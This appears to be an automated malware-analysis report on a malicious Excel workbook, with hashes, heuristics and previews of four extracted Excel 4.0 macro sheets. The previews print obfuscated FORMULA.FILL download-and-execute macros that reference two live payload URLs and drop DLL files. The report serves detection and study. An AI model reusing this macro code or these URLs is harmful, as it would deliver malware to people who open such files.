Office (OOXML) malware analysis — malicious · f38ab469417a595c

MALICIOUS

Office (OOXML)

155.2 KB Created: 2006-09-16 00:00:00 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2021-06-30

MD5: f986a62433fc690720d54b8a96dde251 SHA-1: 06b6a4b584d075d2f8e2fdbe2f8000914486f28f SHA-256: f38ab469417a595cdbdff7a1d27cc2844be91f891ece6b2ea7c860b5fc7dae51

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

This Excel file contains Excel 4.0 macros, which are known to be used for malicious purposes. The macros utilize dangerous functions like FORMULA.FILL and FORMULA to download and execute payloads from external URLs. The presence of these functions and the embedded URLs strongly suggest an attempt to download and run a second-stage malicious component.

Heuristics 4

Excel 4.0 macro sheet (4 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME

Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
Dangerous XLM formula APIs: FORMULA.FILL, FORMULA, HALT critical OOXML_XLM_DANGEROUS_FN

Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://ecology-japan.com/nHi2nZU1fqyM/gg.html In document text (OOXML body / shared strings)
- https://jjcart.net/TQuC4kcg/gg.htmlIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/spreadsheetml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`xlm_sheet_00.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/intlsheet3.xml	1503 bytes
SHA-256: `6396b663a4fd54b7f58c0a9133692e01e530055da80fd936b10721f3c7989126`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="AI6"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="34" max="34" width="4.5703125" customWidth="1"/><col min="35" max="35" width="4.5703125" hidden="1" customWidth="1"/></cols><sheetData><row r="6" spans="35:35" x14ac:dyDescent="0.25"><c r="AI6" s="1" t="b"><f>FORMULA.FILL('Doc2'!AR122&'Doc2'!AR123&'Doc2'!AR136&'Doc2'!AQ148&'Doc2'!AR137&'Doc2'!AR140&'Doc2'!AR137&'Doc2'!AQ149&'Doc2'!AR137&'Doc2'!AR140&'Doc2'!AR137&'Doc2'!AQ150&'Doc2'!AR137&'Doc2'!AR140&'Doc2'!AR142&'Doc2'!AR140&'Doc2'!AR137&'Doc2'!AQ109&'Doc2'!AR137&'Doc2'!AR140&'Doc2'!AR137&'Doc2'!AQ106&'Doc2'!AR137&'Doc2'!AR140&'Doc2'!AR142&'Doc2'!AR140&'Doc2'!AR142&'Doc2'!AR139,'Doc2'!AO149)='Doc5'!AM2()</f><v>1</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
`xlm_sheet_01.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/intlsheet2.xml	1525 bytes
SHA-256: `8d10f47fc333f48ab24da329bc50acbf5ad96dbffc855723427f6dda1fd22b94`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="AG6"/><sheetViews><sheetView showFormulas="1" zoomScaleNormal="100" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="32" max="32" width="4.5703125" customWidth="1"/><col min="33" max="33" width="4.5703125" hidden="1" customWidth="1"/></cols><sheetData><row r="6" spans="33:33" x14ac:dyDescent="0.25"><c r="AG6" s="1" t="b"><f>FORMULA.FILL('Doc2'!AR122&'Doc2'!AR123&'Doc2'!AR136&'Doc2'!AQ148&'Doc2'!AR137&'Doc2'!AR140&'Doc2'!AR137&'Doc2'!AQ149&'Doc2'!AR137&'Doc2'!AR140&'Doc2'!AR137&'Doc2'!AQ150&'Doc2'!AR137&'Doc2'!AR140&'Doc2'!AR142&'Doc2'!AR140&'Doc2'!AR137&'Doc2'!AQ108&'Doc2'!AR137&'Doc2'!AR140&'Doc2'!AR137&'Doc2'!AQ105&'Doc2'!AR137&'Doc2'!AR140&'Doc2'!AR142&'Doc2'!AR140&'Doc2'!AR142&'Doc2'!AR139,'Doc2'!AO148)='Doc4'!AI4()</f><v>1</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
`xlm_sheet_02.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/intlsheet1.xml	11306 bytes
SHA-256: `3534428ae04c8748b30395c535d82383fafebe35201b605b4b184928cd71445b`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="AO103:AS161"/><sheetViews><sheetView showFormulas="1" zoomScaleNormal="100" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="40" max="40" width="4.42578125" customWidth="1"/><col min="41" max="45" width="4.5703125" hidden="1" customWidth="1"/></cols><sheetData><row r="103" spans="41:45" x14ac:dyDescent="0.25"><c r="AO103" s="1"/><c r="AP103" s="1"/><c r="AQ103" s="1"/><c r="AR103" s="1"/><c r="AS103" s="1"/></row><row r="104" spans="41:45" x14ac:dyDescent="0.25"><c r="AO104" s="1"/><c r="AP104" s="1"/><c r="AQ104" s="1"/><c r="AR104" s="1"/><c r="AS104" s="1"/></row><row r="105" spans="41:45" x14ac:dyDescent="0.25"><c r="AO105" s="1"/><c r="AP105" s="1"/><c r="AQ105" t="str"><f>"..\cexyz1.dll"</f><v>..\cexyz1.dll</v></c><c r="AR105" s="1"/><c r="AS105" s="1"/></row><row r="106" spans="41:45" x14ac:dyDescent="0.25"><c r="AO106" s="1"/><c r="AP106" s="1"/><c r="AQ106" s="1" t="str"><f>"..\cexyz2.dll"</f><v>..\cexyz2.dll</v></c><c r="AR106" s="1"/><c r="AS106" s="1"/></row><row r="107" spans="41:45" x14ac:dyDescent="0.25"><c r="AO107" s="1"/><c r="AP107" s="1"/><c r="AQ107" s="1"/><c r="AR107" s="1"/><c r="AS107" s="2"/></row><row r="108" spans="41:45" x14ac:dyDescent="0.25"><c r="AO108" s="1"/><c r="AP108" s="1"/><c r="AQ108" s="1" t="str"><f>"https://ecology-japan.com/nHi2nZU1fqyM/gg.html"</f><v>https://ecology-japan.com/nHi2nZU1fqyM/gg.html</v></c><c r="AR108" s="1"/><c r="AS108" s="1"/></row><row r="109" spans="41:45" x14ac:dyDescent="0.25"><c r="AO109" s="1"/><c r="AP109" s="1"/><c r="AQ109" s="1" t="str"><f>"https://jjcart.net/TQuC4kcg/gg.html"</f><v>https://jjcart.net/TQuC4kcg/gg.html</v></c><c r="AR109" s="1"/><c r="AS109" s="1"/></row><row r="110" spans="41:45" x14ac:dyDescent="0.25"><c r="AO110" s="1"/><c r="AP110" s="1"/><c r="AQ110" s="1"/><c r="AR110" s="1"/><c r="AS110" s="1"/></row><row r="111" spans="41:45" x14ac:dyDescent="0.25"><c r="AO111" s="1"/><c r="AP111" s="1"/><c r="AQ111" s="1"/><c r="AR111" s="1"/><c r="AS111" s="1"/></row><row r="112" spans="41:45" x14ac:dyDescent="0.25"><c r="AO112" s="2"/><c r="AP112" s="1"/><c r="AQ112" s="1"/><c r="AR112" s="1"/><c r="AS112" s="1"/></row><row r="113" spans="41:45" x14ac:dyDescent="0.25"><c r="AO113" s="2" t="b"><f>FORMULA('Doc2'!AQ130&'Doc2'!AQ131&'Doc2'!AQ132,'Doc2'!AQ148)</f><v>1</v></c><c r="AP113" s="1"/><c r="AQ113" s="2"/><c r="AR113" s="2" t="s"><v>0</v></c><c r="AS113" s="1"/></row><row r="114" spans="41:45" x14ac:dyDescent="0.25"><c r="AO114" s="2" t="b"><f>FORMULA('Doc2'!AQ114&'Doc2'!AQ115&'Doc2'!AQ116&'Doc2'!AQ117&'Doc2'!AQ118,'Doc2'!AQ149)</f><v>1</v></c><c r="AP114" s="1"/><c r="AQ114" s="2" t="s"><v>1</v></c><c r="AR114" s="2" t="s"><v>2</v></c><c r="AS114" s="1"/></row><row r="115" spans="41:45" x14ac:dyDescent="0.25"><c r="AO115" s="1"/><c r="AP115" s="1"/><c r="AQ115" s="2" t="s"><v>3</v></c><c r="AR115" s="2" t="s"><v>4</v></c><c r="AS115" s="1"/></row><row r="116" spans="41:45" x14ac:dyDescent="0.25"><c r="AO116" s="1"/><c r="AP116" s="1"/><c r="AQ116" s="2" t="s"><v>5</v></c><c r="AR116" s="2"/><c r="AS116" s="1"/></row><row r="117" spans="41:45" x14ac:dyDescent="0.25"><c r="AO117" s="1"/><c r="AP117" s="1"/><c r="AQ117" s="2" t="s"><v>6</v></c><c r="AR117" s="2"/><c r="AS117" s="1"/></row><row r="118" spans="41:45" x14ac:dyDescent="0.25"><c r="AO118" s="1"/><c r="AP118" s="1"/><c r="AQ118" s="2" t="str"><f>RIGHT("rsthYFGIPUYiugeA",2)</f><v>eA</v></c><c r="AR118" s="2"/><c r="AS118" s="1"/></row><row r="119" spans="41:45" x14ac:dyDescent="0.25"><c r="AO119" s="1"/><c r="AP119" ... (truncated)
`xlm_sheet_03.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/intlsheet4.xml	1099 bytes
SHA-256: `116442751b27cac0ac22dfe8ef12d959cf127fb14d16558c667e52c97787bca2`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="AM4"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="39" max="39" width="4.5703125" hidden="1" customWidth="1"/></cols><sheetData><row r="4" spans="39:39" x14ac:dyDescent="0.25"><c r="AM4" s="2" t="b"><f>FORMULA.FILL('Doc2'!AQ136&'Doc2'!AQ137&'Doc2'!AQ138&'Doc2'!AQ139&'Doc2'!AQ140&'Doc2'!AQ141&'Doc2'!AQ142&"2 ",'Doc2'!AQ154)='Doc2'!AO130()</f><v>1</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.